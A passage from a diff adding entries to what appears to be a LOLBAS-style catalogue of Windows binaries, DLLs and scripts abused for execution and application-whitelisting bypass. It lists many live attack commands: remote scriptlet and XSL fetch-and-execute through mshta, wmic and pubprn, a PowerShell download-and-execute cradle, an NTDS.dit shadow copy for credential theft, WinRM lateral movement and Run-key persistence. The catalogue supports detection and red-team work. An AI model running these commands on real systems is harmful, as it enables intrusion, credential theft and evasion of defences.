Create a scheduled execution of C:\GoogleUpdate.exe to run at 9pm.
wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
Create a volume shadow copy of NTDS.dit that can be copied.
wmic.exe process get brief /format:"https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
Execute a script contained in the target .XSL file hosted on a remote server.
wmic.exe os get /format:"MYXSLFILE.xsl"
Executes JScript or VBScript embedded in the target XSL stylesheet.
wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"
Executes JScript or VBScript embedded in the target remote XSL stylsheet.
```
* Resources:
* https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
* https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
* https://twitter.com/subTee/status/986234811944648707
* Full path:
* c:\windows\system32\wbem\wmic.exe
* c:\windows\sysWOW64\wbem\wmic.exe
* Notes: Thanks to Casey Smith - @subtee

19
OSBinaries/Wab.exe.md Normal file
View File

@ -0,0 +1,19 @@
## Wab.exe
* Functions: Execute
```
Wab.exe
Loads a DLL configured in the registry under HKLM.
```
* Resources:
* http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
* https://twitter.com/Hexacorn/status/991447379864932352
* Full path:
* C:\Program Files\Windows Mail\wab.exe
* C:\Program Files (x86)\Windows Mail\wab.exe
* Notes: Thanks to Adam - @Hexacorn
Requires registry changes, Requires Administrative Access

17
OSBinaries/Wscript.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Wscript.exe
* Functions: Execute, Read ADS
```
wscript c:\ads\file.txt:script.vbs
Executes the .VBS script stored as an Alternate Data Stream (ADS).
```
* Resources:
* ?
* Full path:
* c:\windows\system32\wscript.exe
* c:\windows\sysWOW64\wscript.exe
* Notes: Thanks to ?

22
OSBinaries/Xwizard.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Xwizard.exe
* Functions: DLL hijack, Execute
```
xwizard.exe
Xwizard.exe will load a .DLL file located in the same directory (DLL Hijack) named xwizards.dll.
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
Xwizard.exe running a custom class that has been added to the registry.
```
* Resources:
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
* https://www.youtube.com/watch?v=LwDHX7DVHWU
* https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
* Full path:
* c:\windows\system32\xwizard.exe
* c:\windows\sysWOW32\xwizard.exe
* Notes: Thanks to Adam - @Hexacorn, Nick Tyrer - @nicktyrer

26
OSBinaries/hh.exe.md Normal file
View File

@ -0,0 +1,26 @@
## hh.exe
* Functions: Download, Execute
```
HH.exe http://www.google.com
Opens google's web page with HTML Help.
HH.exe C:\
Opens c:\\ with HTML Help.
HH.exe c:\windows\system32\calc.exe
Opens calc.exe with HTML Help.
HH.exe http://some.url/script.ps1
Open the target PowerShell script with HTML Help.
```
* Resources:
* https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
* Full path:
* c:\windows\system32\hh.exe
* c:\windows\sysWOW64\hh.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

30
OSBinaries/mshta.exe.md Normal file
View File

@ -0,0 +1,30 @@
## mshta.exe
* Functions: Execute, Read ADS
```
mshta.exe evilfile.hta
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
Executes VBScript supplied as a command line argument.
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
Executes JavaScript supplied as a command line argument.
mshta.exe "C:\ads\file.txt:file.hta"
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
```
* Resources:
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
* https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
* Full path:
* C:\Windows\System32\mshta.exe
* C:\Windows\SysWOW64\mshta.exe
* Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe

21
OSBinaries/odbcconf.exe.md Normal file
View File

@ -0,0 +1,21 @@
## odbcconf.exe
* Functions: Execute
```
odbcconf -f file.rsp
Load DLL specified in target .RSP file.
```
* Resources:
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
* https://github.com/woanware/application-restriction-bypasses
* https://twitter.com/subTee/status/789459826367606784
* Full path:
* c:\windows\system32\odbcconf.exe
* c:\windows\sysWOW64\odbcconf.exe
* Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
See the Playloads folder for an example .RSP file.

17
OSBinaries/reg.exe.md Normal file
View File

@ -0,0 +1,17 @@
## reg.exe
* Functions: Export Reg, Add ADS, Import Reg
```
reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
Export the target Registry key and save it to the specified .REG file.
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* c:\windows\system32\reg.exe
* c:\windows\sysWOW64\reg.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

20
OSBinaries/regedit.exe.md Normal file
View File

@ -0,0 +1,20 @@
## regedit.exe
* Functions: Write ADS, Read ADS, Import registry
```
regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
Export the target Registry key to the specified .REG file.
regedit C:\ads\file.txt:regfile.reg"
Import the target .REG file into the Registry.
```
* Resources:
* https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
* Full path:
* C:\Windows\System32\regedit.exe
* C:\Windows\SysWOW64\regedit.exe
* Notes: Thanks to Oddvar Moe - @oddvarmoe

32
OSLibraries/Advpack.dll.md Normal file
View File

@ -0,0 +1,32 @@
## Advpack.dll
* Functions: Execute
```
rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
rundll32.exe advpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
rundll32.exe Advpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.
rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe"
Launch executable by calling the RegisterOCX function.
rundll32.exe Advpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```
* Resources:
* https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
* https://twitter.com/ItsReallyNick/status/967859147977850880
* https://twitter.com/bohops/status/974497123101179904
* https://twitter.com/moriarty_meng/status/977848311603380224
* Full path:
* c:\windows\system32\advpack.dll
* c:\windows\sysWOW64\advpack.dll
* Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)

28
OSLibraries/Ieadvpack.dll.md Normal file
View File

@ -0,0 +1,28 @@
## Ieadvpack.dll
* Functions: Execute
```
rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified).
rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1,
Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied).
rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe
Launch executable by calling the RegisterOCX function.
rundll32.exe IEAdvpack.dll,RegisterOCX test.dll
Launch a DLL payload by calling the RegisterOCX function.
```
* Resources:
* https://twitter.com/pabraeken/status/991695411902599168
* https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
* https://twitter.com/0rbz_/status/974472392012689408
* Full path:
* c:\windows\system32\ieadvpack.dll
* c:\windows\sysWOW64\ieadvpack.dll
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)

22
OSLibraries/Ieframe.dll.md Normal file
View File

@ -0,0 +1,22 @@
## Ieframe.dll
* Functions: Execute
```
rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz
Renamed URL file.
```
* Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* Full path:
* c:\windows\system32\Ieframe.dll
* c:\windows\sysWOW64\Ieframe.dll
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops

17
OSLibraries/Mshtml.dll.md Normal file
View File

@ -0,0 +1,17 @@
## Mshtml.dll
* Functions: Execute
```
rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Invoke an HTML Application. Note - Pops a security warning and a print dialogue box.
```
* Resources:
* https://twitter.com/pabraeken/status/998567549670477824
* Full path:
* c:\windows\system32\Mshtml.dll
* c:\windows\sysWOW64\Mshtml.dll
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

17
OSLibraries/Pcwutl.dll.md Normal file
View File

@ -0,0 +1,17 @@
## Pcwutl.dll
* Functions: Execute
```
rundll32.exe pcwutl.dll,LaunchApplication calc.exe
Launch executable by calling the LaunchApplication function.
```
* Resources:
* https://twitter.com/harr0ey/status/989617817849876488
* Full path:
* c:\windows\system32\Pcwutl.dll
* c:\windows\sysWOW64\Pcwutl.dll
* Notes: Thanks to Matt harr0ey - @harr0ey

23
OSLibraries/Setupapi.dll.md Normal file
View File

@ -0,0 +1,23 @@
## Setupapi.dll
* Functions: Execute
```
rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf
Launch an executable file via the InstallHinfSection function and .inf file section directive.
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```
* Resources:
* https://twitter.com/pabraeken/status/994742106852941825
* https://twitter.com/subTee/status/951115319040356352
* https://twitter.com/KyleHanslovan/status/911997635455852544
* https://github.com/huntresslabs/evading-autoruns
* Full path:
* c:\windows\system32\Setupapi.dll
* c:\windows\sysWOW64\Setupapi.dll
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)

22
OSLibraries/Shdocvw.dll.md Normal file
View File

@ -0,0 +1,22 @@
## Shdocvw.dll
* Functions: Execute
```
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz"
Renamed URL file.
```
* Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* Full path:
* c:\windows\system32\Shdocvw.dll
* c:\windows\sysWOW64\Shdocvw.dll
* Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops

26
OSLibraries/Shell32.dll.md Normal file
View File

@ -0,0 +1,26 @@
## Shell32.dll
* Functions: Execute
```
rundll32.exe shell32.dll,Control_RunDLL payload.dll
Launch DLL payload.
rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe
Launch executable payload.
rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi"
Launch executable payload with arguments.
```
* Resources:
* https://twitter.com/Hexacorn/status/885258886428725250
* https://twitter.com/pabraeken/status/991768766898941953
* https://twitter.com/mattifestation/status/776574940128485376
* https://twitter.com/KyleHanslovan/status/905189665120149506
* Full path:
* c:\windows\system32\shell32.dll
* c:\windows\sysWOW64\shell32.dll
* Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)

22
OSLibraries/Syssetup.dll.md Normal file
View File

@ -0,0 +1,22 @@
## Syssetup.dll
* Functions: Execute
```
rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF
Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf
Remote fetch and execute a COM Scriptlet by calling an information file directive.
```
* Resources:
* https://twitter.com/pabraeken/status/994392481927258113
* https://twitter.com/harr0ey/status/975350238184697857
* https://twitter.com/bohops/status/975549525938135040
* Full path:
* c:\windows\system32\Syssetup.dll
* c:\windows\sysWOW64\Syssetup.dll
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)

36
OSLibraries/Url.dll.md Normal file
View File

@ -0,0 +1,36 @@
## Url.dll
* Functions: Execute
```
rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta"
Launch a HTML application payload by calling OpenURL.
rundll32.exe url.dll,OpenURL "C:\\test\\calc.url"
Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling OpenURL.
rundll32.exe url.dll,FileProtocolHandler calc.exe
Launch an executable payload by calling FileProtocolHandler.
rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Launch a HTML application payload by calling FileProtocolHandler.
rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling FileProtocolHandler.
```
* Resources:
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/974043815655956481
* https://twitter.com/DissectMalware/status/995348436353470465
* https://twitter.com/yeyint_mth/status/997355558070927360
* https://twitter.com/Hexacorn/status/974063407321223168
* Full path:
* c:\windows\system32\url.dll
* c:\windows\sysWOW64\url.dll
* Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)

21
OSLibraries/Zipfldr.dll.md Normal file
View File

@ -0,0 +1,21 @@
## Zipfldr.dll
* Functions: Execute
```
rundll32.exe zipfldr.dll,RouteTheCall calc.exe
Launch an executable payload by calling RouteTheCall.
rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable payload by calling RouteTheCall.
```
* Resources:
* https://twitter.com/moriarty_meng/status/977848311603380224
* https://twitter.com/bohops/status/997896811904929792
* Full path:
* c:\windows\system32\zipfldr.dll
* c:\windows\sysWOW64\zipfldr.dll
* Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)

20
OSScripts/CL_Invocation.ps1.md Normal file
View File

@ -0,0 +1,20 @@
## CL_Invocation.ps1
* Functions: Execute
```
. C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1 \nSyncInvoke <executable> [args]
Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable.
```
* Resources:
* https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
* https://twitter.com/bohops/status/948548812561436672
* https://twitter.com/pabraeken/status/995107879345704961
* Full path:
* C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
* C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1
* Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)

19
OSScripts/CL_Mutexverifiers.ps1.md Normal file
View File

@ -0,0 +1,19 @@
## CL_Mutexverifiers.ps1
* Functions: Execute
```
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1
runAfterCancelProcess calc.ps1
Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable.
```
* Resources:
* https://twitter.com/pabraeken/status/995111125447577600
* Full path:
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
* C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
* C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)

20
OSScripts/Manage-bde.wsf.md Normal file
View File

@ -0,0 +1,20 @@
## Manage-bde.wsf
* Functions: Execute
```
set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf
Set the comspec variable to another executable prior to calling manage-bde.wsf for execution.
copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf
Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file.
```
* Resources:
* https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712
* https://twitter.com/bohops/status/980659399495741441
* Full path:
* C:\Windows\System32\manage-bde.wsf
* Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)

19
OSScripts/Pubprn.vbs.md Normal file
View File

@ -0,0 +1,19 @@
## Pubprn.vbs
* Functions: Execute
```
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Set the 2nd variable with a Script COM moniker to perform Windows Script Host (WSH) Injection.
```
* Resources:
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://github.com/enigma0x3/windows-operating-system-archaeology
* Full path:
* C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
* C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3

18
OSScripts/Slmgr.vbs.md Normal file
View File

@ -0,0 +1,18 @@
## Slmgr.vbs
* Functions: Execute
```
reg.exe import c:\path\to\Slmgr.reg & cscript.exe /b c:\windows\system32\slmgr.vbs
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
```
* Resources:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss
* Full path:
* c:\windows\system32\slmgr.vbs
* c:\windows\sysWOW64\slmgr.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3, Casey Smith - @subTee

17
OSScripts/SyncAppvPublishingServer.vbs.md Normal file
View File

@ -0,0 +1,17 @@
## SyncAppvPublishingServer.vbs
* Functions: Execute
```
SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
Inject PowerShell script code with the provided arguments
```
* Resources:
* https://twitter.com/monoxgas/status/895045566090010624
* https://twitter.com/subTee/status/855738126882316288
* Full path:
* C:\Windows\System32\SyncAppvPublishingServer.vbs
* Notes: Thanks to Nick Landers - @monoxgas, Casey Smith - @subTee

27
OSScripts/Winrm.vbs.md Normal file
View File

@ -0,0 +1,27 @@
## Winrm.vbs
* Functions: Execute
```
reg.exe import c:\path\to\Slmgr.reg & winrm quickconfig
Hijack the Scripting.Dictionary COM Object to execute remote scriptlet (SCT) code.
winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985
Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol.
winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 \nwinrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985
Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol.
```
* Resources:
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
* https://www.youtube.com/watch?v=3gz1QmiMhss
* https://github.com/enigma0x3/windows-operating-system-archaeology
* https://redcanary.com/blog/lateral-movement-winrm-wmi/
* https://twitter.com/bohops/status/994405551751815170
* Full path:
* C:\windows\system32\winrm.vbs
* C:\windows\SysWOW64\winrm.vbs
* Notes: Thanks to Matt Nelson - @enigma0x3 (Hijack), Casey Smith - @subtee (Hijack), Red Canary Company cc Tony Lambert - @redcanaryco (Win32_Process LM), Jimmy - @bohops (Win32_Service LM)

18
OSScripts/pester.bat.md Normal file
View File

@ -0,0 +1,18 @@
## pester.bat
* Functions: Execute code using Pester. The third parameter can be anything. The fourth is the payload.
```
Pester.bat [/help|?|-?|/?] "$null; notepad"
Execute notepad
```
* Resources:
* https://twitter.com/Oddvarmoe/status/993383596244258816
* https://github.com/api0cradle/LOLBAS/blob/master/OSScripts/pester.md
* Full path:
* c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
* c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
* Notes: Thanks to Emin Atac - @p0w3rsh3ll

16
OtherBinaries/AcroRd32.exe.md Normal file
View File

@ -0,0 +1,16 @@
## AcroRd32.exe
* Functions: Execute
```
Replace C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe by your binary
Hijack RdrCEF.exe with a payload executable to launch when opening Adobe
```
* Resources:
* https://twitter.com/pabraeken/status/997997818362155008
* Full path:
* C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

16
OtherBinaries/Gpup.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Gpup.exe
* Functions: Execute
```
Gpup.exe -w whatever -e c:\Windows\System32\calc.exe
Execute another command through gpup.exe (Notepad++ binary).
```
* Resources:
* https://twitter.com/pabraeken/status/997892519827558400
* Full path:
* C:\Program Files (x86)\Notepad++\updater\gpup.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

17
OtherBinaries/Nlnotes.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Nlnotes.exe
* Functions: Execute
```
NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```
* Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
* Full path:
* C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
* Notes: Thanks to Daniel Bohannon - @danielhbohannon

17
OtherBinaries/Notes.exe.md Normal file
View File

@ -0,0 +1,17 @@
## Notes.exe
* Functions: Execute
```
Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```
* Resources:
* https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
* https://twitter.com/HanseSecure/status/995578436059127808
* Full path:
* C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
* Notes: Thanks to Daniel Bohannon - @danielhbohannon

31
OtherBinaries/Nvudisp.exe.md Normal file
View File

@ -0,0 +1,31 @@
## Nvudisp.exe
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
```
Nvudisp.exe System calc.exe
Execute calc.exe as a subprocess.
Nvudisp.exe Copy test.txt,test-2.txt
Copy fila A to file B.
Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value.
Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
Create shortcut file.
Nvudisp.exe KillApp calculator.exe
Kill a process.
Nvudisp.exe Run foo
Run process
```
* Resources:
* http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
* Full path:
* C:\windows\system32\nvuDisp.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

31
OtherBinaries/Nvuhda6.exe.md Normal file
View File

@ -0,0 +1,31 @@
## Nvuhda6.exe
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
```
nvuhda6.exe System calc.exe
Execute calc.exe as a subprocess.
nvuhda6.exe Copy test.txt,test-2.txt
Copy fila A to file B.
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value
nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
Create shortcut file.
nvuhda6.exe KillApp calc.exe
Kill a process.
nvuhda6.exe Run foo
Run process
```
* Resources:
* http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
* Full path:
* Missing
* Notes: Thanks to Adam - @hexacorn

16
OtherBinaries/ROCCAT_Swarm.exe.md Normal file
View File

@ -0,0 +1,16 @@
## ROCCAT_Swarm.exe
* Functions: Execute
```
Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
```
* Resources:
* https://twitter.com/pabraeken/status/994213164484001793
* Full path:
* C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

16
OtherBinaries/Setup.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Setup.exe
* Functions: Execute
```
Run Setup.exe
Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
```
* Resources:
* https://twitter.com/pabraeken/status/994381620588236800
* Full path:
* C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

16
OtherBinaries/Usbinst.exe.md Normal file
View File

@ -0,0 +1,16 @@
## Usbinst.exe
* Functions: Execute
```
Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through DefaultInstall Section Directive in INF file.
```
* Resources:
* https://twitter.com/pabraeken/status/993514357807108096
* Full path:
* C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

16
OtherBinaries/VBoxDrvInst.exe.md Normal file
View File

@ -0,0 +1,16 @@
## VBoxDrvInst.exe
* Functions: Persistence
```
VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
```
* Resources:
* https://twitter.com/pabraeken/status/993497996179492864
* Full path:
* C:\Program Files\Oracle\VirtualBox Guest Additions
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken

24
OtherMSBinaries/Appvlp.exe.md Normal file
View File

@ -0,0 +1,24 @@
## Appvlp.exe
* Functions: Execute
```
AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
```
* Resources:
* https://github.com/MoooKitty/Code-Execution
* https://twitter.com/moo_hax/status/892388990686347264
* Full path:
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)

22
OtherMSBinaries/Bginfo.exe.md Normal file
View File

@ -0,0 +1,22 @@
## Bginfo.exe
* Functions: Execute
```
bginfo.exe bginfo.bgi /popup /nolicprompt
Execute VBscript code that is referenced within the bginfo.bgi file.
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
This style of execution may not longer work due to patch.
```
* Resources:
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
* Full path:
* No fixed path
* Notes: Thanks to Oddvar Moe - @oddvarmoe

19
OtherMSBinaries/Cdb.exe.md Normal file
View File

@ -0,0 +1,19 @@
## Cdb.exe
* Functions: Execute
```
